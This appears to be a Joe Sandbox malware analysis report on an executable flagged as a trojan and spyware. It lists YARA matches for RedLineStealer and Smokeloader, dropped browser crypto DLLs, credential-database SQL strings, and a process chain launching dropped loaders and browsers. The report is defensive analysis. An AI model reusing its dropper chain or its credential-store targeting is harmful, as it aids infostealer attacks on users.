Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B0512	0_2_6C5B0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AED10	0_2_6C5AED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59FD00	0_2_6C59FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C0DD0	0_2_6C5C0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E85F0	0_2_6C5E85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A9E50	0_2_6C5A9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C3E50	0_2_6C5C3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D2E4E	0_2_6C5D2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A4640	0_2_6C5A4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58C670	0_2_6C58C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6E63	0_2_6C5F6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C7E10	0_2_6C5C7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D5600	0_2_6C5D5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E9E30	0_2_6C5E9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58BEF0	0_2_6C58BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59FEF0	0_2_6C59FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F76E3	0_2_6C5F76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A5E90	0_2_6C5A5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EE680	0_2_6C5EE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4EA0	0_2_6C5E4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C7710	0_2_6C5C7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C599F00	0_2_6C599F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B6FF0	0_2_6C5B6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58DFE0	0_2_6C58DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D77A0	0_2_6C5D77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A8850	0_2_6C5A8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AD850	0_2_6C5AD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CF070	0_2_6C5CF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C597810	0_2_6C597810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CB820	0_2_6C5CB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D4820	0_2_6C5D4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F50C7	0_2_6C5F50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AC0E0	0_2_6C5AC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C58E0	0_2_6C5C58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B60A0	0_2_6C5B60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AA940	0_2_6C5AA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DB970	0_2_6C5DB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FB170	0_2_6C5FB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59D960	0_2_6C59D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C5190	0_2_6C5C5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E2990	0_2_6C5E2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BD9B0	0_2_6C5BD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58C9A0	0_2_6C58C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C9A60	0_2_6C5C9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C8AC0	0_2_6C5C8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A1AF0	0_2_6C5A1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CE2F0	0_2_6C5CE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FBA90	0_2_6C5FBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59CAB0	0_2_6C59CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F2AB0	0_2_6C5F2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5822A0	0_2_6C5822A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B4AA0	0_2_6C5B4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C585340	0_2_6C585340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59C370	0_2_6C59C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CD320	0_2_6C5CD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F53C8	0_2_6C5F53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58F380	0_2_6C58F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63AC60	0_2_6C63AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AC30	0_2_6C70AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F6C00	0_2_6C6F6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62ECC0	0_2_6C62ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68ECD0	0_2_6C68ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FED70	0_2_6C6FED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75AD50	0_2_6C75AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8D20	0_2_6C7B8D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BCDC0	0_2_6C7BCDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C634DB0	0_2_6C634DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6D90	0_2_6C6C6D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CEE70	0_2_6C6CEE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710E20	0_2_6C710E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63AEC0	0_2_6C63AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D0EC0	0_2_6C6D0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B6E90	0_2_6C6B6E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F2F70	0_2_6C6F2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69EF40	0_2_6C69EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770F20	0_2_6C770F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C636F10	0_2_6C636F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70EFF0	0_2_6C70EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C630FE0	0_2_6C630FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C778FB0	0_2_6C778FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63EFB0	0_2_6C63EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C704840	0_2_6C704840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680820	0_2_6C680820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BA820	0_2_6C6BA820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7368E0	0_2_6C7368E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71C8C0	0_2_6C71C8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C668960	0_2_6C668960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686900	0_2_6C686900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74C9E0	0_2_6C74C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6649F0	0_2_6C6649F0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C5C94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C5BCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7B09D0 appears 79 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368

Source: file.exe, 00000000.00000002.2443224125.000000000244C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2468067392.000000006C612000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 48f0ec6733.exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: random[1].exe.0.dr	Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: enter[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: enter[1].exe.0.dr	Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: axplong.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: axplong.exe.5.dr	Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: explorti.exe.8.dr	Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: explorti.exe.8.dr	Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326

Source: axplong.exe.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@141/390@137/41

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C5E7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\XJMWU3X2.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3436

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\1000003002\ee7a49fbf0.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA3E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT OR IGNORE INTO index_data (index_id, value, object_data_key, object_store_id, value_locale) VALUES (:index_id, :value, :object_data_key, :object_store_id, :value_locale);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2120221543.0000000022C95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2104567912.0000000022C79000.00000004.00000020.00020000.00000000.sdmp, IEHCBAFIDAECBGCBFHJE.0.dr, CFIIIJJKJKFHIDGDBAKJ.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: RoamingCBFCFBFBFB.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingIJDGCAEBFI.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1048
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
